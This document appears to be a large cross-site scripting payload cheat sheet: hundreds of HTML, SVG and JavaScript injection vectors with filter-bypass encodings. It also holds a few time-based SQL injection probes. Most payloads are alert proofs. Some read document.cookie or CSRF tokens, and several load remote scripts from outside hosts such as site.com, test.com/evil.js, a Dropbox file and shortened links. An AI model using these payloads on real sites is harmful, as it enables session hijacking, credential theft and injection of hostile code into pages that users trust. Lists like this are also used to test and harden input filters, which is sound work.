?/!#/n/?http://www.facebook.com javascript://%0aalert(1)// <iframe><iframe src=”/>”><p <a><img/src=”x”/onerror=”prompt(document.cookie)”> Bypass Chrome XSS filter: “><svg><script>/<1/>alert(document.cookie)</script></svg> javascript:alert(document.getElementsByTagName(‘meta’)[‘csrf-token’].getAttribute(‘content’)); document.getElementsByName(‘Login’).item(0).src = ‘’ <script xmlns=”http://www.w3.org/1999/xhtml">alert(13)</script> ‘&colon;’ <svg><style>*{font-family:’<svg onload=confirm(1)>’;} ‘%2bbenchmark(10000000%2csha1(1))%2b’ ‘+or+benchmark(0,md5(1))=’ ‘+or+benchmark(10000000,md5(1))=’ BENCHMARK(10000000,SHA1(1)) </script><script>confirm(document.domain)</script> %25%32%37-alert(1337)-%25%32%37 <script>eval(“aler”+(!![]+[])[+[]])(“xss »)</script> <p><img src=\\”#\\” onerror=\\”alert(document.cookie);\\”><strong>test</strong></p> <HTML xmlns: ><audio> <audio src=wp onerror=alert(0X1)> <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(/@blinkms/) <svg/onload=alert(1) <img class=”emoji” alt=”??” src=”x” /><svg onload=prompt(document.domain)> javascript://google.com/?%0aalert%28document.cookie%29 <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A> <XSS STYLE=”xss:expression(alert(‘XSS’))”> Flash-based XSS (ExternalInterface.call()): “\”));alert(/XSS/)}catch(e){}//” “/alert(/XSS/)/”\”/ “/alert(/XSS/)/” \”/alert(/XSS/);// ‘|alert(‘XSS’)|’ “><i/style=”background:url(javascript:a=\”<scr\”+\”ipt%20src=http://site.com/1.js></script>\")"> “><i/style=”background:url(javascript:document.write(\”<scr\”+\”ipt src=’http://site.com/1.js'></script>\"))"> </a/style=color:expression(alert(‘xss’));%0d> </a/style=color:expression(location.href=’ht’+’tp://google.com’);%0d> <a/href=”file://c:\windows\system32\calc.exe”;%0d>Link</a;%0d> “></a style=”background:url(javascript:alert(‘xss’))”> “></ style=”background:url(javascript:alert(‘xss’))”> “><svg><script>/<@/>alert(1337)</script> ‘<\i\m\g \s\r\c=x 
\o\n\e\r\r\o\r=\a\l\e\r\t(\’X\S\S\’)\>’ <xpm><script </xpm> alert(61) </script> <![CDATA[<]]>script<![CDATA[>]]>alert(‘xss’)<![CDATA[<]]>/script<![CDATA[>]]> <script type=”text/javascript”>//<![CDATA[var _0x64f5=[“\x63\x6F\x6F\x6B\x69\x65”];alert(document[_0x64f5[0]]);// ]]></script> </SCRIPT>’><script>alert(String.fromCharCode(88,83,83))</SCRIPT> \x61\x6c\x65\x72\x74\x28\x31\x29 \x3Cscript>alert(document.cookie)\x3C/script> \x3Cscript\3Ealert(document.cookie)\x3C/script\3E &lt;script&gt;alert(document.cookie)&lt;/script&gt; <div style=”width: expression(alert(/XSS_Jasminder/));”></div> <script <a href=””>atob</a>/,alert(document.domain)</script </td> <svg/onload=location=/javas/.source%2B/cript/.source%2Blocation.hash[2]%2B/al/.source%2B/ert()/.source//#+: ‘” ?</style></scRipt><scRipt>alert(‘Xss by Yassin’)</scRipt> <img src=x onerror=’alert(/xss/)’> “><svg/onload=alert(00)> “]));alert(1)}catch(e){alert(document.location)}// t” onmouseover=alert(/xss/); a=” “!><iframe/src \/\/onload = prompt(“Xssed!”) \/ <svg onload=”alert(3)// ?”onclick=alert(/media:content/)// <svg onload=”alert(3)// “/> <svg/onload=alert(3)// “/> <img src=l onerror=alert(62)// ‘”/&gt;<img src=”l” onerror=”alert(/a/)//” “http://www.example.com/exploit509.js < script > alert (1)</ script> data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K# “onmouseenter=”confirm(document.domain) %253Cscript%253Ealert(5)%253C%252Fscript%253E <script>alert(5)</script> “><svg/onload=prompt(3);> <javascript:alert(document.cookie);> “><img src=x onerror=alert(123)> “><div/onmouseover=’prompt(String.fromCharCode(88,83,83))’> %27);alert(document.cookie)// javascript:prompt(1); test”);+alert(String.fromCharCode(88,83,83))// “ onmouseover=prompt(932661) bad=” “ onmouseover=alert(55)> </script><script>alert(/ABOUKIR/)</script> &quot;&gt;&lt;img src=x onerror=confirm(1);&gt; ‘>”><script>alert(0);</script> <script>alert(0);</script> <scrIpt>prompt(0);</script> <script/src=”http://test.com/evil.js"> <script>delete 
alert;alert(1)</script> <svg><script/href=//?? />?—?IE <script src=”https://www.dropbox.com/s/hp796og5p9va7zt/face.js?dl=1"> </script <svg><script/href= /> <script>confirm(0);</script> <iframe src=”javascript:alert(63) » <form><isindex formaction=”javascript&colon;confirm(1)> <embed/code=//goo.gl/nlX0P? <embed/src=//goo.gl/nlX0P> <object/data=//goo.gl/nlX0P> <isindex action=//goo.gl/nlX0P type=image> <form action=//goo.gl/nlX0P><input type=”submit”> <meta http-equiv=”refresh” content=”0;url=//goo.gl/nlX0P”> <applet code=”javascript:confirm(document.cookie);”> <iframe/src=”data:text/html,<iframe/src=http://jsfiddle.net/d7Xu7/1/>"> <isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) <iframe/src=”javascript:alert(document.cookie)”http://jsfiddle.net/d7Xu7/1/>"> type=image> <isindex x=”javascript:” onmouseover=”alert(1)”> “><p id=”\u0070rompt(1)”onmouseover=\u0065val(id) // “><a fooooooooooooooooooooooooooooooooo href=JaVAScript%26colon%3Bprompt%26lpar%3B1%26rpar%3B%> <img/src=”x”/onerror=”prom\u0070t&#x28;&#x27;&#x58;&#x53;&#x53;&#x27;&#x29;”> <q oncut=\u0070rompt(64)> “><p id=””onmouseover=\u0070rompt(1) // <a%20x%20href=javascript%26%2358%3Bprompt(1)>a</a> ‘;alert(String.fromCharCode(88,83,83))//\’; alert(String.fromCharCode(88,83,83))//”; alert(String.fromCharCode(88,83,83))//\”; alert(String.fromCharCode(88,83,83))// ?</SCRIPT>”>’><SCRIPT> alert(String.fromCharCode(88,83,83))</SCRIPT> */(URL[%26quot;\142\151\147%26quot;][%26quot;\143\157\156\163\164\162\165\143\164\157\162%26quot;](%26quot;\141\154\145\162\164\75\141\154\145\162\164\50\61\51%26quot;)())’%3E%3C%%20style=’x:expression/* 1) <a href=”javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;”><button> 2) <div onmouseover=’alert&lpar;1&rpar;’>DIV</div> 3) <iframe style=”position:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)”> c 4) <a href=”jAvAsCrIpT&colon;alert&lpar;1&rpar;”>X</a> 7) <var onmouseover=”prompt(1)”>On Mouse Over</var>? 
8) <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> 9) <img src=”/” =_=” title=”onerror=’prompt(1)’”> 10) <%<!?—?‘%><script>alert(1);</script ? 11) <script src=”data:text/javascript,alert(1)”></script> 12) <iframe/src \/\/onload = prompt(1) 13) <iframe/onreadystatechange=alert(1) 15) <input value=<><iframe/src=javascript:confirm(1) <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=# onmouseover=”alert(‘xxs’)”> <IMG SRC= onmouseover=”alert(‘xxs’)”> <IMG onmouseover=”alert(‘xxs’)”> <IMG SRC=/ onerror=”alert(String.fromCharCode(88,83,83))”></img> <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <SCRIPT/XSS SRC=”http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)> <<SCRIPT>alert(“XSS”);//<</SCRIPT> <video> <source onerror=”javascript:alert(1)”> <video onerror=”javascript:alert(1)”><source> <audio onerror=”javascript:alert(1)”><source> <input autofocus onfocus=alert(1)> <select autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)> <keygen autofocus onfocus=alert(1)> <button form=test onformchange=alert(65)>X <form><button formaction=”javascript:alert(1)”> <svg><x><script>alert&#40;1&#41</x> <svg><x><script>alert&#40;&#39;1&#39;&#41</x> <svg onload=window.onerror=alert;throw/12/;//« /> <img src=x onerror=while(true){prompt(13)}> <iframe src=””/srcdoc=’&lt;svg onload&equals;alert&lpar;14&rpar;&gt;’> <!?—?<img src=” ?<img src=x onerror=alert(1)//”> <svg id=javascript:alert(1) onload=location=id> <svg id=alert(1) onload=eval(id)> <img src=x:alert(alt) onerror=eval(src) alt=xwx> <body/onpageshow=(alert)(1)> <svg id=alert(1) onload=eval(id)> <svg onload=(alert)(1) > <frameset onload=alert(1)> <picture><source srcset=”x”><img onerror=”alert(1)”></picture> <picture><img 
srcset=”x” onerror=”alert(1)”></picture> <img srcset=”,,,,,x” onerror=”alert(1)”> /*To bypass input values*/ “autofocus/onfocus=”alert &#40/1&#41 onfocus=onfocus=\u0061lert(1) autofocus autofocus onfocus=window.onerror=alert;throw/1/;// /*Bypass filtration “script/alert”*/ <script>$=1,alert($)</script> <script ~~~>confirm(1)</script ~~~> <script>$=1,\u0061lert($)</script> <</script/script><script>eval(‘\\u’+’0061'+’lert(1)’)//</script> <</script/script><script ~~~>\u0061lert(1)</script ~~~> </style></scRipt><scRipt>alert(1)</scRipt> /*Tougher policy on the HTML tags*/ <h1 onmouseover=alert&lpar;1&rpar;>xwx <h1/onmouseover=’\u0061lert(1)’>xwx <marquee/onstart=alert(1)>xwx <div/onmouseover=’alert(1)’>xwx <h1/onmouseover=’alert(1)’>xwx<applet code=”javascript:confirm(document.cookie);”> <h1 onmouseover=’alert(1)’>xwx <p onmouseover=’alert(1)’>xwx <p/onmouseover=’alert(1)’>xwx /*Classic, very popular vectors*/ <script>alert(1)</script> </script><img src=x onerror=alert(1);> </script><iframe/onload=alert(1)> <img src=x onerror=alert(1);> <style ONLOAD=prompt(1)> <iframe/onload=alert(1)> <svg/onload=prompt(1)> <svg onload=alert(1)> “style=background:black; onmouseover=alert(1)” “autofocus/onfocus=”alert(1) “onmouseover=”alert(1);” “/onmouseover= alert(1)> “onload=”alert(1)”” /*HTML5 popular vectors*/ <video/poster/onerror=alert(1)> <video><source onerror=”javascript:alert(1)”> <video onerror=”javascript:alert(1)”><source> <audio onerror=”javascript:alert(1)”><source> <input autofocus onfocus=alert(1)> <select autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)> <keygen autofocus onfocus=alert(1)> <form><button formaction=”javascript:alert(1)”> /*data:text*/ data:text/plain,alert(‘xwx’) data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== /*Bonus DOM-based XSS vector for the popular WordPress plugin prettyPhoto*/ #!prettyPhoto/2,<a onclick=”alert(1);”>/ /*firefox*/ #prettyPhoto[gallery]/1,<a onclick=”alert(1);”>/ /*firefox*/ #prettyPhoto[rmsg0d]/2,<img src=x 
onerror=alert(1)>/ /*firefox*/ #prettyphoto[pp_gal]/2,<img src=1 onerror=alert(1)> /*Only Google chrome*/ <input onfocus=write(1) autofocus> <input onblur=write(1) autofocus><input autofocus> <video poster=javascript:alert(1)//></video> <body onscroll=alert(1)><br><br><br><br><br><br>…<br><br><br><br><input autofocus> <form id=test onforminput=alert(1)><input></form><button form=test onformchange=alerte(66)>X</button> <video><source onerror=”alert(1)”> <video onerror=”alert(1)”><source></source></video> <form><button formaction=”javascript:alert(1)”>X</button> <body oninput=alert(1)><input autofocus> <math href=”javascript:alert(1)”>CLICKME</math> <math> <!?—?up to FF 13 ? <maction actiontype=”statusline#http://google.com" xlink:href=”javascript:alert(67) »>CLICKME</maction> <!?—?FF 14+ ? <maction actiontype=”statusline” xlink:href=”javascript:alert(3)”>CLICKME<mtext>http://http://google.com</mtext></maction> </math> <link rel=”import” href=”http://yassineaboukir.com/xss.svg" /> <iframe srcdoc=”&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;” /> picture><source srcset=”x”><img onerror=”alert(1)”></picture> <picture><img srcset=”x” onerror=”alert(1)”></picture> <img srcset=”,,,,,x” onerror=”alert(1)”> <iframe srcdoc=”<svg onload=alert(1)&nvgt;”></iframe> <a href=”javascript:&apos;<svg onload&equals;alert&lpar;1&rpar;&nvgt;&apos;”>CLICK</a> —?—?Vectors working on HTML4 and older versions — <frameset onload=alert(1)> <table background=”javascript:alert(1)”></table> <!?—?<img src=” ?<img src=x onerror=alert(1)//”> <comment><img src=”</comment><img src=x onerror=alert(1)//”> <!?—?up to Opera 11.52, FF 3.6.28 ? <![><img src=”]><img src=x onerror=alert(1)//”> <!?—?IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+ ? 
<svg><![CDATA[><image xlink:href=”]]><img src=xx:x onerror=alert(68(69))//« ></svg> <style><img src=”</style><img src=x onerror=alert(1)//”> <li style=list-style:url() onerror=alert(1)></li> <div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div> <head><base href=”javascript://”/></head><body><a href=”/. /,alert(1)//#”>XXX</a></body> <SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT> <OBJECT CLASSID=”clsid:333C7BC4–460F-11D0-BC04–0080C7055A83"><PARAM NAME=”DataURL” VALUE=”javascript:alert(1)”></OBJECT> <object data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”></object> <embed src=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”></embed> <b <script>alert(1)//</script>0</script></b> <div id=”div1"><input value=”``onmouseover=alert(1)”></div> <div id=”div2"></div><script>document.getElementById(“div2”).innerHTML = document.getElementById(“div1”).innerHTML;</script> <!?—?IE 6–8 ? <x ‘=”foo”><x foo=’><img src=x onerror=alert(1)//’> <!?—?IE 6–9 ? <! ‘=”foo”><x foo=’><img src=x onerror=alert(69)//’> <? ‘=”foo”><x foo=’><img src=x onerror=alert(3)//’> <embed src=”javascript:alert(1)”></embed> // O10.10?, OM10.0?, GC6?, FF <img src=”javascript:alert(70)”> <image src=”javascript:alert(71)”> // IE6, O10.10?, OM10.0? <script src=”javascript:alert(3)”></script> // IE6, O11.01?, OM10.1? <div style=width:1px;filter:glow onfilterchange=alert(1)>x</div> <object allowscriptaccess=”always” data=”test.swf”></object> class XSS {public static function main() { flash.Lib.getURL(new flash.net.URLRequest(flash.Lib._root.url||”javascript:alert(1)”),flash.Lib._root.name||”_top”); }} [A] <? foo=”><script>alert(1)</script>”> <! foo=”><script>alert(1)</script>”> </ foo=”><script>alert(1)</script>”> [B] <? foo=”><x foo=’?><script>alert(1)</script>’>”> [C] <! 
foo=”[[[x]]”><x foo=”]foo><script>alert(1)</script>”> [D] <% foo><x foo=”%><script>alert(1)</script>”> <iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe> <iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe> <html> <body> <b>some content without two new line \n\n</b> Content-Type: multipart/related; boundary=”******”<b>some content without two new line</b>?—?****** Content-Location: xss.html Content-Transfer-Encoding: base64 PGlmcmFtZSBuYW1lPWxvIHN0eWxlPWRpc3BsYXk6bm9uZT48L2lmcmFtZT4NCjxzY3JpcHQ+DQp1 cmw9bG9jYXRpb24uaHJlZjtkb2N1bWVudC5nZXRFbGVtZW50c0J5TmFtZSgnbG8nKVswXS5zcmM9 dXJsLnN1YnN0cmluZyg2LHVybC5pbmRleE9mKCcvJywxNSkpO3NldFRpbWVvdXQoImFsZXJ0KGZy YW1lc1snbG8nXS5kb2N1bWVudC5jb29raWUpIiwyMDAwKTsNCjwvc2NyaXB0PiAgICAg?—?****** — </body> </html> <!?—?IE 5–9 ? <div id=d><x xmlns=”><iframe onload=alert(1)”></div> <script>d.innerHTML+=’’;</script> <!?—?IE 10 in IE5–9 Standards mode ? <div id=d><x xmlns=’”><iframe onload=alert(72)//’></div> <script>d.innerHTML+=’’;</script> <img[a][b]src=x[d]onerror[c]=[e]”alert(1)”> <a href=”[a]java[b]script[c]:alert(1)”>XXX</a> <img src=”x` `<script>alert(1)</script>”` `> <img src onerror /” ‘”= alt=alert(1)//”> <title onpropertychange=alert(1)></title><title title=></title> <!?—?IE 5–8 standards mode ? <a href=http://foo.bar/#x=`y></a><img alt=”`><img src=xx:x onerror=alert(1)></a>”> <!?—?IE 5–9 standards mode ? <!a foo=x=`y><img alt=”`><img src=xx:x onerror=alert(73)//”> <?a foo=x=`y><img alt=”`><img src=xx:x onerror=alert(3)//”> <!?—?[if]><script>alert(1)</script ? <!?—?[if<img src=x onerror=alert(74)//]> ? 
<script src=”/\example.com\foo.js”></script> // Safari 5.0, Chrome 9, 10 <script src=”\\example.com\foo.js”></script> // Safari 5.0 <object id=”x” classid=”clsid:CB927D12–4FF7–4a9e-A169–56E4B8A75598"></object> <object classid=”clsid:02BF25D5–8C17–4B23-BC80-D3488ABDDC6B” onqt_error=”alert(1)” style=”behavior:url(#x);”><param name=postdomevents /></object> <!?—?`<img/src=xx:xx onerror=alert(1)//?—?!> <xmp> <% </xmp> <img alt=’%></xmp><img src=xx:x onerror=alert(1)//’> <script> x=’<%’ </script> %>/ alert(75) </script> XXX <style> *[‘<!?—?‘]{} </style> ?{} *{color:red}</style> <a style=”-o-link:’javascript:alert(1)’;-o-link-source:current”>X</a> <a style=”-o-link:’javascript:alert(1)’;-o-link-source:current”>X</a> <style>@import “data:,*%7bx:expression(write(1))%7D”;</style> <link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d <a style=”pointer-events:none;position:absolute;”><a style=”position:absolute;” onclick=”alert(1);”>XXX</a></a><a href=”javascript:alert(76)”>XXX</a> <style>*[{}@import’test.css?]{color: green;}</style>X * {-o-link:’javascript:alert(1)’;-o-link-source: current;} <div style=”font-family:’foo[a];color:red;’;”>XXX</div> <div style=”font-family:foo}color=red;”>XXX</div> <div style=”[a]color[b]:[c]red”>XXX</div> <div style=”\63&#9\06f&#10\0006c&#12\00006F&#13\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \&#xA0or:blue;”>XXX</div> <// style=x:expression\28write(1)\29> <style>*{x:expression(write(1))}</style> <div style=”list-style:url(http://foo.f)\20url(javascript:alert(1));">X</div> <div id=d><div style=”font-family:’sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B’”>X</div></div> <script>with(document.getElementById(“d”))innerHTML=innerHTML</script> <script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script> <script>({0:#0=alert/#0#/#0#(0)})</script> <script>ReferenceError.prototype.__defineGetter__(‘name’, function(){alert(1)}),x</script> <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._(‘alert(1)’)()</script> 
<script>history.pushState(0,0,’/i/am/somewhere_else’);</script> <script src=”#”>{alert(1)}</script>;1 <b><script<b></b><alert(1)</script </b></b> <script<{alert(1)}/></script </> 0?<script>Worker(“#”).onmessage=function(_)eval(_.data)</script> :postMessage(importScripts(‘data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk’)) <script>crypto.generateCRMFRequest(‘CN=0’,0,0,null,’alert(1)’,384,null,’rsa-dual-use’)</script> <script>[{‘a’:Object.prototype.__defineSetter__(‘b’,function(){alert(arguments[0])}),’b’:[‘secret’]}]</script> <svg xmlns=”http://www.w3.org/2000/svg"><g onload=”javascript:alert(1)”></g></svg> <svg xmlns=”http://www.w3.org/2000/svg"><script>alert(1)</script></svg> <svg onload=”javascript:alert(1)” xmlns=”http://www.w3.org/2000/svg"></svg> <svg xmlns=”http://www.w3.org/2000/svg"> <a xmlns:xlink=”http://www.w3.org/1999/xlink" xlink:href=”javascript:alert(1)”><rect width=”1000" height=”1000" fill=”white”/></a> </svg> <svg xmlns=”http://www.w3.org/2000/svg" xmlns:xlink=”http://www.w3.org/1999/xlink"> <animation xlink:href=”javascript:alert(1)”/> <animation xlink:href=”data:text/xml,%3Csvg xmlns=’http://www.w3.org/2000/svg' onload=’alert(1)’%3E%3C/svg%3E”/> <image xlink:href=”data:image/svg+xml,%3Csvg xmlns=’http://www.w3.org/2000/svg' onload=’alert(1)’%3E%3C/svg%3E”/> <foreignObject xlink:href=”javascript:alert(1)”/> <foreignObject xlink:href=”data:text/xml,%3Cscript xmlns=’http://www.w3.org/1999/xhtml'%3Ealert(1)%3C/script%3E"/> </svg> <svg xmlns=”http://www.w3.org/2000/svg"> <handler xmlns:ev=”http://www.w3.org/2001/xml-events" ev:event=”load”>alert(1)</handler> </svg> <svg><style>&lt;img/src=x onerror=alert(1)// </b> <svg xmlns=”http://www.w3.org/2000/svg"> <set attributeName=”onmouseover” to=”alert(1)”/> <animate attributeName=”onunload” to=”alert(1)”/> </svg> <svg><script> alert&DiacriticalGrave;1&DiacriticalGrave; <p> <svg><script> alert&grave;1&grave; <p> <doc xmlns:xlink=”http://www.w3.org/1999/xlink" xmlns:html=”http://www.w3.org/1999/xhtml"> 
<html:style /><x xlink:href=”javascript:alert(1)” xlink:type=”simple”>XXX</x> </doc> <x xmlns:xlink=”http://www.w3.org/1999/xlink" xlink:actuate=”onLoad” xlink:href=”javascript:alert(1)” xlink:type=”simple”/> <meta charset=”x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi <meta charset=”x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> <meta charset=”x-mac-farsi”>¼script ¾alert(1)//¼/script ¾